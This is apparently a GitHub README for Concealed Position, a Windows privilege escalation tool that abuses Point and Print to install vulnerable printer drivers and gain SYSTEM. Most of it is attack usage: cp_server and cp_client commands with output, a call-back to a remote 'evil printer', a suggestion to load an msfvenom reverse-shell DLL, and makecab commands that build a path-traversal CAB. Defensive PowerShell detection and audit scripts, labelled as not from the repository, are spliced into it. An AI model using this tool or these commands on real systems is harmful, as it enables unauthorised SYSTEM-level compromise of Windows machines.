Bring your own print driver privilege escalation tool

Overview

Concealed Position

Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) abuses the as-designed Package Point and Print logic in Windows that allows a low-privilege user to stage and install printer drivers. CP installs drivers with known vulnerabilities, which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.

What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

  • ACIDDAMAGE (abuses the Lexmark Universal v2 driver)
  • POISONDAMAGE (a race condition to overwrite a DLL)
  • RADIANTDAMAGE (a race condition to overwrite a DLL)
  • SLASHINGDAMAGE (the evil printer attack against CutePDF Writer; patched)

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that, as far as I know, has not historically been done.

But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE, hopefully, is patched most everywhere.

How does it work?

Concealed Position has two parts: an evil printer (the server) and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Stage 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: AddPrinter
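Stages 1 and 2 are the part of this flow a defender can see on the target, because the spooler records driver staging in its own event log. The following PowerShell script is an added example of mine, not code from the Concealed Position repository: it pulls driver added/updated events (ID 316) and plug-in load failures (ID 808) from the Microsoft-Windows-PrintService/Operational log and flags drivers on a watch list seeded with the Lexmark Universal v2 driver this page shows ACIDDAMAGE using. Two assumptions: the regex matches the 316 message wording ("Printer driver <name> for Windows ...") on your build, and the Operational log has been enabled, since it is off by default.

```powershell
# Added example (not from the Concealed Position repo): surface the driver
# staging/install of Stages 1 and 2 from the PrintService/Operational log.
# Assumptions: Event ID 316 ("Printer driver <name> for Windows <arch>
# Version-<n> was added or updated. Files:- ...") carries the driver name in
# its message text, and Event ID 808 reports a plug-in module the spooler
# failed to load; the regex below matches the 316 wording and may need
# adjusting for a given build.

param(
    [int]$Hours = 24,
    # Watch list seeded with the driver this page shows ACIDDAMAGE using.
    [string[]]$WatchDrivers = @('Lexmark Universal v2')
)

$log = 'Microsoft-Windows-PrintService/Operational'

# The Operational log is disabled by default; nothing below is recorded until
# it is enabled (as admin): wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
$cfg = Get-WinEvent -ListLog $log -ErrorAction Stop
if (-not $cfg.IsEnabled) {
    Write-Warning "$log is disabled; enable it with: wevtutil sl $log /e:true"
}

$filter = @{
    LogName   = $log
    Id        = 316, 808
    StartTime = (Get-Date).AddHours(-$Hours)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

foreach ($e in $events) {
    switch ($e.Id) {
        316 {
            # Stage 1/2: a driver package landed in the driver store and was installed.
            if ($e.Message -match 'Printer driver (?<drv>.+?) for Windows') {
                $drv  = $Matches['drv']
                $flag = ''
                if ($WatchDrivers -contains $drv) { $flag = 'WATCHLIST' }
                [pscustomobject]@{
                    Time   = $e.TimeCreated
                    Event  = 'DriverAddedOrUpdated'
                    Detail = $drv
                    Flag   = $flag
                }
            }
        }
        808 {
            # The spooler tried to load a driver plug-in and failed; worth a look
            # whenever it follows a driver add from an unexpected source.
            [pscustomobject]@{
                Time   = $e.TimeCreated
                Event  = 'PluginLoadFailed'
                Detail = ($e.Message -split "`n")[0]
                Flag   = 'REVIEW'
            }
        }
    }
}
```

Run it as an administrator on the machine under review (for example `.\Get-PrintDriverEvents.ps1 -Hours 72`); the output is a list of objects, so it pipes into Export-Csv or Where-Object as needed. A 316 for a vendor driver on a workstation that has no business installing vendor drivers is the signal this page's Stage 1 and 2 leave behind.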

It is important to note that SLASHINGDAMAGE doesn't actually work like that, though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEF CON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.

Is this a Windows vulnerability?

Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver, a low-privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.

Which versions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.
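A defender-side check for the boundary just described, added here as an example of mine rather than anything from the Concealed Position repository: it reads the Point and Print policy values that decide whether a non-administrator may stage and install a driver, then lists the third-party drivers already sitting in the driver store. RestrictDriverInstallationToAdministrators is the value Microsoft introduced with the CVE-2021-34481 fix; when it is absent, builds from August 2021 onward behave as if it were set to 1. The "Expect" values are the hardened settings, and treating `Manufacturer -ne 'Microsoft'` as "third party" is a heuristic I am assuming, not a Microsoft definition.

```powershell
# Added example (not from the Concealed Position repo): report the Point and
# Print policy values that decide whether a non-admin can stage and install a
# print driver, then list third-party drivers already in the driver store.
# The "Expect" values are the hardened settings. RestrictDriverInstallation-
# ToAdministrators was introduced with the CVE-2021-34481 fix; when the value
# is absent, builds from August 2021 onward behave as if it were 1.
# Assumption: Manufacturer -ne 'Microsoft' as "third party" is a heuristic.

$pnp  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$ppnp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint'

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    # Missing key or missing value both come back as $null.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-PointAndPrintPolicy {
    $checks = @(
        @{ Name = 'RestrictDriverInstallationToAdministrators'; Path = $pnp;  Expect = 1
           Why  = 'only administrators may install drivers through Point and Print' }
        @{ Name = 'NoWarningNoElevationOnInstall';               Path = $pnp;  Expect = 0
           Why  = 'keep the elevation prompt when a driver is installed' }
        @{ Name = 'UpdatePromptSettings';                        Path = $pnp;  Expect = 0
           Why  = 'keep the prompt when an existing driver is updated' }
        @{ Name = 'PackagePointAndPrintServerList';              Path = $ppnp; Expect = 1
           Why  = 'package point and print limited to the approved server list' }
    )
    foreach ($c in $checks) {
        $actual = Get-PolicyValue -Path $c.Path -Name $c.Name
        if ($null -eq $actual)         { $state = 'NOT SET (OS default applies)' }
        elseif ($actual -eq $c.Expect) { $state = 'OK' }
        else                           { $state = 'WEAK' }
        [pscustomobject]@{
            Setting  = $c.Name
            Actual   = $actual
            Expected = $c.Expect
            State    = $state
            Note     = $c.Why
        }
    }
}

function Get-ThirdPartyPrinterDriver {
    # Vendor drivers are what a bring-your-own-driver attack needs on the box;
    # InfPath shows where each package sits in the driver store.
    Get-PrinterDriver |
        Where-Object { $_.Manufacturer -ne 'Microsoft' } |
        Select-Object Name, Manufacturer, DriverVersion, InfPath
}

Test-PointAndPrintPolicy | Format-Table -AutoSize
Get-ThirdPartyPrinterDriver | Format-Table -AutoSize
```

A row reading WEAK for RestrictDriverInstallationToAdministrators is the condition this page relies on; NOT SET is acceptable only on builds that carry the August 2021 update. The driver listing is the inventory to compare against the names in the exploit list above.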

How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!

CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    server!

CLI options:
  -h, --help                     Display the help message
  -e, --exploit arg              The exploit to use
  -c, --cabs arg (=.\cab_files)  The location of the cabinet files

Exploits available:
        ACIDDAMAGE
        POISONDAMAGE
        RADIANTDAMAGE
        SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server takes two options:

  1. The exploit to configure the printer for
  2. A path to this repository's cab_files directory (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                           ComputerName    Type         DriverName                PortName        Shared   Published
----                           ------------    ----         ----------                --------        ------   ---------
ACIDDAMAGE                                     Local        Lexmark Universal v2      LPT1:           True     False
CutePDF Writer                                 Local        CutePDF Writer v4.0       CPW4:           False    False
OneNote for Windows 10                         Local        Microsoft Software Pri... Microsoft.Of... False    False
Microsoft XPS Document Writer                  Local        Microsoft XPS Document... PORTPROMPT:     False    False
Microsoft Print to PDF                         Local        Microsoft Print To PDF    PORTPROMPT:     False    False
Fax                                            Local        Microsoft Shared Fax D... SHRFAX:         False    False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.

CP Client

The client is similarly easy to use. Let's look at its command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

CLI options:
  -h, --help         Display the help message
  -r, --rhost arg    The remote evil printer address
  -n, --name arg     The remote evil printer name
  -e, --exploit arg  The exploit to use
  -l, --local        No remote printer. Local attack only.
  -d, --dll arg      Path to user provided DLL to execute.

Exploits available:
        ACIDDAMAGE
        POISONDAMAGE
        RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus exercising the bring-your-own-print-driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo "evil.dll" "../../evil.dll" > files.txt
makecab /f files.txt
move disk1\1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.
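The directive above stores evil.dll under a name that climbs out of the extraction directory, which is the whole trick behind the evil printer package that SLASHINGDAMAGE reuses. The defender's counterpart is to inspect a driver cabinet before anything expands it. The following function is an added example of mine, not code from the Concealed Position repository: it walks the CFHEADER and CFFILE records of a cabinet (Microsoft's published cabinet layout) and flags any stored name containing "..", a rooted path or a drive letter. It never extracts anything. The file name `.\exploit.cab` in the usage lines is just the name the commands above produce; point it at any .cab.

```powershell
# Added example (not from the Concealed Position repo): read the CFFILE table
# of a cabinet and flag entries whose stored name would escape the extraction
# directory. Layout per the Microsoft cabinet format: CFHEADER at offset 0
# (coffFiles at +16 gives the first CFFILE), CFFILE = cbFile u4,
# uoffFolderStart u4, iFolder u2, date u2, time u2, attribs u2, szName (NUL
# terminated; attribs bit 0x80 means the name is UTF-8).

function Get-CabFileEntries {
    param([Parameter(Mandatory)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $ms = New-Object System.IO.MemoryStream(,$bytes)
    $r  = New-Object System.IO.BinaryReader($ms)
    try {
        $sig = [System.Text.Encoding]::ASCII.GetString($r.ReadBytes(4))
        if ($sig -ne 'MSCF') { throw "$Path is not a cabinet (signature '$sig')" }
        $null      = $r.ReadUInt32()   # reserved1
        $null      = $r.ReadUInt32()   # cbCabinet
        $null      = $r.ReadUInt32()   # reserved2
        $coffFiles = $r.ReadUInt32()   # absolute offset of the first CFFILE entry
        $null      = $r.ReadUInt32()   # reserved3
        $null      = $r.ReadByte()     # versionMinor
        $null      = $r.ReadByte()     # versionMajor
        $null      = $r.ReadUInt16()   # cFolders
        $cFiles    = $r.ReadUInt16()
        # flags/setID/iCabinet and the optional reserve/prev/next fields are not
        # needed: coffFiles already locates the file table.

        $ms.Position = $coffFiles
        $entries = for ($i = 0; $i -lt $cFiles; $i++) {
            $cbFile  = $r.ReadUInt32()
            $null    = $r.ReadUInt32()   # uoffFolderStart
            $iFolder = $r.ReadUInt16()
            $null    = $r.ReadUInt16()   # date
            $null    = $r.ReadUInt16()   # time
            $attribs = $r.ReadUInt16()
            $nameBytes = New-Object System.Collections.Generic.List[byte]
            while (($b = $r.ReadByte()) -ne 0) { $nameBytes.Add($b) }
            $enc  = if ($attribs -band 0x80) { [System.Text.Encoding]::UTF8 } else { [System.Text.Encoding]::Default }
            $name = $enc.GetString($nameBytes.ToArray())
            [pscustomobject]@{
                Name      = $name
                Size      = $cbFile
                Folder    = $iFolder
                # "..", a leading slash/backslash, or a drive letter all escape
                # the directory the package is expanded into.
                Traversal = ($name -match '(^|[\\/])\.\.([\\/]|$)') -or
                            ($name -match '^[\\/]') -or
                            ($name -match '^[A-Za-z]:')
            }
        }
        return $entries
    } finally {
        $r.Dispose()
    }
}

# Usage: list the entries and refuse packages that would write outside the target directory.
$entries = Get-CabFileEntries -Path '.\exploit.cab'
$entries | Format-Table -AutoSize
if ($entries | Where-Object Traversal) {
    Write-Warning 'cabinet contains path-traversal entries; do not expand it'
}
```

For the files.txt directive shown above, the single entry comes back with Name `../../evil.dll` and Traversal set to True; a legitimate driver package lists only bare file names and yields no warning.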

Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.

Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).

Issues
  • Block unauthenticated requests - Error 1272 or 5

    Hi there, floyd from Pentagrid here (the "POISONDAMAGE" guys)

    I tried to use concealed position and it worked fine until I tried to install the printer with cp_client.exe. It seems deactivating the password protected sharing in the advanced sharing settings is breaking the exploit in this setup. The error message of cp_client.exe is:

    Couldn't connect to the remote printer: 1272

    Digging a little, I found that error 1272 is probably:

    You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

    And of course if I don't deactivate password protected sharing, I get:

    Couldn't connect to the remote printer: 2

    Which is access denied, because cp_client.exe didn't authenticate.

    Some more debug info. This line fails:

    https://github.com/jacob-baines/concealed_position/blob/c41ef9b95fbce456f7685209db44004e5a7dbf0b/src/cp_client/main.cpp#L54

    OpenPrinter doc is here and is called with the first argument (pPrinterName) being a UNC path (\\<name>):

    https://docs.microsoft.com/en-us/windows/win32/printdocs/openprinter

    So the question is which component is responsible for authentication on the UNC paths. Probably the machine sees that it is a non-authenticated share. So we need authentication. The question is if there is something that allows accepting any NTLM/Kerberos authentication the Windows machine is doing.

    Any chance to fix this? Any other ideas?

    Edit: I'm going to try to mount the server first (aka "net use Z: \\Server\SharedFolder passwordGoesHere /USER:userAccountGoesHere /persistent:no"), then try the exploit again. I guess the UNC authentication part is transparent Windows magic to OpenPrinter and if the printer is already "mounted" that might work.

    opened by floyd-fuh 2
  • Potential bug in how cp_client.exe -l -e POISONDAMAGE works

    You cannot run cp_client.exe -l -e POISONDAMAGE without first running cp_server.exe -e POISONDAMAGE and deleting the shared printer. If you do, it tells you the driver doesn't exist; if you don't delete the shared printer, it tells you the printer is already installed. Is this a bug?

    opened by Simon-Davies 0
Owner: Jacob Baines (Reverse Engineer & Programmer)